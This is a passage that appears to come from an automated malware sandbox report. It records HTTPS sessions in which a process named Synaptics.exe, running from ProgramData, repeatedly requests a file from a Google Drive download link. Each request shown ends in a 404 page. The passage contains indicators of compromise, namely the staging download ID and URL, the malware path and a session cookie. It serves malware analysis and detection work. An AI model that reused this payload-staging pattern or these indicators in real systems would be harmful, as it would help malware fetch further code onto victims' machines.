                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-MoA5Z0TPY8kSdC5PKgDZcw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Content-Length: 1652
                                                                                              Server: UploadServer
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                              Connection: close
                                                                                              2025-01-02 19:29:20 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                              2025-01-02 19:29:20 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 48 67 51 6d 56 38 74 79 33 44 55 4e 52 61 35 42 4f 46 33 4d 69 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                              Data Ascii: 404 (Not Found)!!1</title><style nonce="HgQmV8ty3DUNRa5BOF3MiA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                              2025-01-02 19:29:20 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                              Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              108192.168.2.750097216.58.206.784434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:29:19 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Host: docs.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                                                                                              2025-01-02 19:29:20 UTC1314INHTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Thu, 02 Jan 2025 19:29:20 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-y1JWOGDseUogCSWL82BcZg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                              109192.168.2.750098142.250.186.129443
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:29:19 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                                                                                              2025-01-02 19:29:20 UTC1250INHTTP/1.1 404 Not Found
                                                                                              X-GUploader-UploadID: AFiumC5yHLV0dRQ955kHixB6pM-zja66B9bHv6XqMiW_LTjrpqQ0EG-m1y7H3Otu8xCUe--eSP5yqFo
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Thu, 02 Jan 2025 19:29:20 GMT
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-yP9Iw9b0d1tXycBgwAl0Gw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Content-Length: 1652
                                                                                              Server: UploadServer
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                              Connection: close
                                                                                              2025-01-02 19:29:20 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                              2025-01-02 19:29:20 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 65 6d 68 32 52 6c 54 4c 32 43 42 6a 7a 53 33 33 76 78 53 38 64 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                              Data Ascii: 404 (Not Found)!!1</title><style nonce="emh2RlTL2CBjzS33vxS8dg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                              2025-01-02 19:29:20 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                              Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              110192.168.2.750104216.58.206.784434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:29:20 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Host: docs.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                                                                                              2025-01-02 19:29:21 UTC1314INHTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Thu, 02 Jan 2025 19:29:21 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-GsfgMww_3da2Cs0xG_188w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              111192.168.2.750106142.250.186.1294434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:29:20 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                                                                                              2025-01-02 19:29:21 UTC1250INHTTP/1.1 404 Not Found
                                                                                              X-GUploader-UploadID: AFiumC6UESL7_ngE9-XEMPc9saozz4sYjxyg8luQAkMgKlJc6rwMhaGFJqcsjp-Mvkbm9gkpWFIHOt8
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Thu, 02 Jan 2025 19:29:21 GMT
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-yJP3YN7kj7PHVPpeWQc6fw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Content-Length: 1652
                                                                                              Server: UploadServer
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                              Connection: close
                                                                                              2025-01-02 19:29:21 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                              2025-01-02 19:29:21 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 76 67 43 45 66 53 4a 52 78 37 55 30 46 64 4b 6b 44 33 77 48 64 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                              Data Ascii: 404 (Not Found)!!1</title><style nonce="vgCEfSJRx7U0FdKkD3wHdQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                              2025-01-02 19:29:21 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                              Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              112192.168.2.750108216.58.206.784434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:29:21 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Host: docs.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                                                                                              2025-01-02 19:29:21 UTC1314INHTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Thu, 02 Jan 2025 19:29:21 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-F69Z7O-PAJ8lxnvKNRQ5sw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              113192.168.2.750107142.250.186.1294434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:29:21 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                                                                                              2025-01-02 19:29:21 UTC1243INHTTP/1.1 404 Not Found
                                                                                              X-GUploader-UploadID: AFiumC7_YBKVFDcScWGLRFpUcPWcR5Evw8_MYK8Pzgmqpsy1Drxb40yvOYcx0WizVSrM8-1o
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Thu, 02 Jan 2025 19:29:21 GMT
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce--3PEpwT8x_P87-faJTPaew' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Length: 1652
                                                                                              Server: UploadServer
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                              Connection: close
                                                                                              2025-01-02 19:29:21 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                              2025-01-02 19:29:21 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 30 4c 45 78 72 51 4d 36 4b 76 66 70 30 2d 57 79 35 2d 38 32 37 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                              Data Ascii: t Found)!!1</title><style nonce="0LExrQM6Kvfp0-Wy5-827w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                              2025-01-02 19:29:21 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                              Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              114192.168.2.750116216.58.206.784434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:29:21 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Host: docs.google.com
                                                                                              Cache-Control: no-cache
